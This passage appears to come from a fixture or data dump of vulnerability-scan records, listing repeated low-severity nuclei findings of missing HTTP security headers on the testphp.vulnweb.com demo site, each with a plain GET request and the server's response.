HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:35.096Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 630, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:35.245Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 631, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:35.395Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 632, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:35.549Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 633, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:35.701Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 634, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:35.852Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 635, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:36.006Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 636, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:36.170Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 637, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:36.317Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 638, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:41:36.468Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 639, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:36.637Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 640, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:36.808Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 641, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:36.960Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 642, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:37.120Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 643, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:37.271Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 644, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": 